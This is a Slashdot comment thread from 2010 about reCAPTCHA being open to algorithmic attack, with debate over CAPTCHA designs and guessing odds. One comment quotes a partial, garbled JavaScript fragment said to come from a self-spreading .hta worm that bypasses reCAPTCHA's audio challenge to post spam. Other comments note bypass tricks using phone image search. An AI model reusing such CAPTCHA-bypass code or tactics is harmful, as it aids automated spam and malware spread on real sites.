Nice idea, but I can break it trivially with my Android phone: Open "goggles", point at screen, click, and "Similar Images" gives me the answer (or a multi-word answer containing the answer you're looking for).
I have to keep my hand really still as I take the shots though, so perhaps a bit of image distortion would be enough to work around that.
Re:New Human Verification Scheme by Anonymous Coward · 2010-08-05 15:09 · Score: 0

That's Excellent.
Re:New Human Verification Scheme by KahabutDieDrake · 2010-08-05 15:54 · Score: 2, Interesting

If you used something that wasn't a public resource based around text strings, then yes.

Better still... show a bank of images, ask which one has a happy little girl in it. (all images contain a girl, only one obviously happy). Randomize the backend with a cryptographic routine (so the file names don't give anything away) and you are set for a while. Computers are terrible at such things, people are pretty good at it.
Re:New Human Verification Scheme by Anonymous Coward · 2010-08-05 19:09 · Score: 0

Multiple choice doesnt work for captcha. Say you had 9 choices... you are guaranteed 11% pass rate just from guessing. That's not nearly good enough. A spammer would expect to beat your system after 5 tries. No sweat for an automated system.
Re:New Human Verification Scheme by BlueMonk · 2010-08-05 23:08 · Score: 1

It would be hard to come up with a bank of images as large as Google images. It has to be quite large because otherwise someone could create a database of picture checksums unless some sort of distortion was applied.
I don't specifically see how detecting a happy girl in a picture is better than picking a description of a picture. Personally I would think picking a description that looks like a good categorization of 3 images (as the program does) is even more difficult to fake. It requires more than a single ability; a large vocabulary of words and experience. Maybe your idea is better in that it's easier for people with a limited vocabulary.
Re:New Human Verification Scheme by BlueMonk · 2010-08-05 23:11 · Score: 1

You didn't look at the program or read my post carefully enough. You have to do this 3 times in a row, which yields less than 1% probability of randomly guessing a correct answer. With a 1 hour delay after 3 bad attempts, this would significantly limit automated passage through the system.
Re:New Human Verification Scheme by BlueMonk · 2010-08-06 00:17 · Score: 1

Interesting. I'm not familiar with that app/feature (I don't have a smart phone). It gives you a list of words along with the similar pictures you say? I wonder what the actual probability of the result containing the same word as the test is. The actual test shows 3 pictures and it's up to the human to pick the common element out of them. I wonder if the android app could/would find the same word in 3 lists (or 2 of the 3).
Yes, distortion is another thing that occurred to me that would probably be easy to add if it would introduce some degree of additional challenge to the automated systems without hindering real humans too much.

Let's hope they hit 100% by drinkypoo · 2010-08-05 13:04 · Score: 2, Interesting

Then we can just put reCAPTCHA on all pages being used for spam, and get transcription services for free.

--
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"

Re:Let's hope they hit 100% by Anonymous Coward · 2010-08-05 14:51 · Score: -1, Troll

Hey drinkypoo,
Nothing to do with your post, but I have five modpoints. I am tired of you vomiting ten comments in a thread before I can even read the summary. Be prepared to lose a bunch of karma, you stupid pencilneck nerd.
Re:Let's hope they hit 100% by cmdrwhitewolf · 2010-08-09 03:05 · Score: 1

Bravo! I haven't seen such a display of flaming stupidity in a while. So, you disagree with Drinkypoo's viewpoint and that he can express it before you can, so you decide the devolve into name calling. Did anyone ever tell you that you might just be a bloody slow reader?
Well, at least now we have proof that the mod point system is totally indiscriminate, because it's giving out points to individuals who probably don't deserve them in the first place...

--
[Now, I'm off to lift my le... Um, visit... at another place.]

Don't Worry by flimflammer · 2010-08-05 13:11 · Score: 1

reCAPTCHA is already on the road to beating this. When your images are on the verge of being discovered algorithmically, use Hebrew.

Zap colors by Anonymous Coward · 2010-08-05 14:06 · Score: 0

Bookmarklets for Zapping Annoyances

https://www.squarefree.com/bookmarklets/zap.html

Try the "zap colors" bookmarklet. There are a few other useful bookmarklets on that page too.

Captcha by Phat_Tony · 2010-08-05 14:26 · Score: 1

When OCR gets so good that recaptcha becomes pointless, my idea for the next step of harder-for-AI captchas is to stop using line art and start using gradients. That is, currently, they use text, which is line art, and then warp it, chop it up, and run miscellaneous clutter through it. It's getting harder and harder for people to read, and machines are still catching up.

I propose that if you start with a photograph, make a selection that's block text, feather the edges, than shift the colors in the selection (Hue, saturation, inversion, remapping, whatever) that it's going to be easier for humans and harder for computers than some of the stuff we've got now. But generating it can be automated just as easily, I scripted Photoshop to make these in a few minutes.

Here's an example

--
Can anyone tell me how to set my sig on Slashdot?

Re:Captcha by sugarmotor · 2010-08-05 16:33 · Score: 1

Sounds like a good idea. You still have to swap out the background photo though.
-> Bicycle ride captcha, where photos are taken from the video of the ride

--
http://stephan.sugarmotor.org
Re:Captcha by sugarmotor · 2010-08-05 17:33 · Score: 1

Actually "Type this text" is not that easy to read -- the usual problem with CAPTCHA development is finding that balance; when you can't use the same picture over and over again, it'll be difficult, I think.
How do you like the one at http://stephansmap.org/sign_up

--
http://stephan.sugarmotor.org
Re:Captcha by Anonymous Coward · 2010-08-06 04:07 · Score: 0

You'd better use images that are not available online for this. Otherwise, the attacker can just throw them at Tineye, subtract a clean copy and get to work as usual. If the same image is used more than once, a similar problem occurs.

Multiple choice doesn't work for CAPTCHAs by mrnobo1024 · 2010-08-05 15:38 · Score: 2, Insightful

The spammers can just choose a random option until they get in. All that will do is slow them down a bit.

Re:Multiple choice doesn't work for CAPTCHAs by BlueMonk · 2010-08-05 23:02 · Score: 1

That's why you have to pick 1 of 6 choices 3 times in a row correctly. The probability of getting that right with completely random guesses is less than 1%. And if you combine it with a 1 hour delay after 3 bad attempts, that should be a significant impedance.
Re:Multiple choice doesn't work for CAPTCHAs by Arlet · 2010-08-06 01:53 · Score: 1

Forced delays become meaningless if the attacker has access to a large botnet
Re:Multiple choice doesn't work for CAPTCHAs by BlueMonk · 2010-08-06 11:37 · Score: 1

It's just one ingredient. Better to have a delay for attackers that don't than not to have one. The less-than-1% chance of success per attempt is still better than the old method, right?
Re:Multiple choice doesn't work for CAPTCHAs by Anonymous Coward · 2010-08-18 02:11 · Score: 0

Multiple choice (multiple answer) actually works pretty well for CAPTCHAs. This is pretty similar to the kitten based CAPTCHAs: http://thepcspy.com/kittenauth/ N options gives you 2^N permutations (you can subtract 2 since all-empty and all-selected may want to be excluded).
If you display 12 images and ask the user to pick all the kittens (kitten detection algorithm ahoi) the bot has to try 4094 possibilities. Add an IP check limiting to 10 tries per 30 minutes, blocking after 30 tries. With each image you add, the number of possibilities rises by the power of two.

Re:The Goggles WORK! by JambisJubilee · 2010-08-05 18:00 · Score: 1

Try taking a picture of the CAPTCHA with your phone using the google goggles app. It works... remarkably well!

Comment removed by account_deleted · 2010-08-05 19:50 · Score: 1

Comment removed based on user account deletion

Captcha's are so yesterday... by Anonymous Coward · 2010-08-05 21:45 · Score: 0

Think of a blind person using a image captcha, ever tried understanding the audio versions!?

Best alternative... http://textcaptcha.com/

(actually, the audio one on here is not bad)

MOD Parent down by Anonymous Coward · 2010-08-05 23:53 · Score: 0

Mod parent down.

RTFA.

WALOC by Anonymous Coward · 2010-08-06 00:03 · Score: 0

Note: the PowerPoint presentation linked opens fine in OpenOffice, and the video speaks for itself.

That's OpenOffice.ORG for you and no IT DOES NOT OPEN FINE. Text is bleeding through all over the slides. And there's no video, just an "swf" file that can't be opened.

Have to know which is known and which is unknown by Sockatume · 2010-08-06 01:21 · Score: 1

If you get one of the answers right, and it's not the known, then you're still stuck, though. So its success rate is closer to 18%: it identifies one word correctly 35% of the time, and on 50% of those occasions, it's the known word.

--
No kidding!!! What do you say at this point?

Code here by Anonymous Coward · 2010-08-06 04:57 · Score: 0

Here's the code:

There's an app spreading around and posting itself around /b/. The interesting thing about it is that the app presents itself as an image requesting itself to be pasted to mspaint and saved as *.hta and ran, then starts posting itself again. Somehow the code survives image compression intact.

The recaptcha breaking code is: // CAPTCHA
var threadurl = "http://boards.4chan.org/" + dir[board] + "/";
if (thread != "") threadurl += "res/" ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ + thread;
get("http://www.google.com/recaptcha/api/challenge?k=6Ldp2bsSAAAAAAJ5uyx_lx34lJeEpTLVkP5k04qc", 1);
var challenge1 = request.responseText.match(/challenge : '([^']+)'/)[1];
get("http://www.google.com/recaptcha/api/reload?c=" + challenge1 + "&k=6Ldp2bsSAAAAAAJ5uyx_lx34lJeEpTLVkP5k04qc&reason=a&type=audio&lang=en&new_audio_default=1", 1);
var challenge2 = request.responseText.match(/finish_reload\('([^']+)'/)[1];
var nwords = 10 + Math.floor(3*Math.random());
response = "";
for (var i = 0; i 0) response += " ";
response += randomchoice(wordlist);
}

There's a quite large random list of common words in english-

I always tought of a similar attack since I tried once the sound re-captcha and couldn't understand a thing on the audio and still was granted access.

correct number: 2.6% by Anonymous Coward · 2010-08-06 10:48 · Score: 0

I guess that "accuracy" is calculated by how many letters were OCRd correctly. Sorry, that measure might make sense for playing hangman, but not for solving a captcha. It's pass or fail.

According to their Powerpoint,

2.6% of the time both words were solved for a guaranteed defeat.

So taking into account that you only need to recognize one word correctly but don't know which one, the bot would have to try about 30 times before getting it right. So it would get banned all the time.

Slashdot Mirror

ReCAPTCHA.net Now Vulnerable to Algorithmic Attack

251 comments